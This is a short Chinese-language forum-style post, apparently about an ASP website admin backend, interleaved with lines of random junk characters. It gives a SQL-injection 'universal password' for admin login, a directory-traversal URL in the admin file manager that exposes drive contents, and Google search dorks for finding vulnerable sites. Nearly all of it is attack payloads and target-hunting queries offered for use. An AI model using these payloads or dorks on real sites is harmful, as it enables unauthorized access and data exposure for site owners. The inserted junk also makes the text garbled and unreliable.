后台万能密码 'or'='or'
, z1 p+ I( J# r; Z+ u3 F% ]# Y( r' H
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!% ?* I; W6 M- K N( p: h9 o
admin/uploadfile.asp?currentFolder=/upfiles/../
$ C2 F) F, d7 l+ ^: @, X( n* F3 U5 I5 s+ {* O! f S3 ]
漏洞证明:( n& C5 a" b2 w& { h; T& C
( q" B; |. n( t谷歌:inurl:type.asp?id=1 新闻中心
* S! A' i. E6 m* S2 M或者 :inurl:download_ok.asp?3 C% |4 b9 N l7 g
& ~3 Y! ?* \1 z |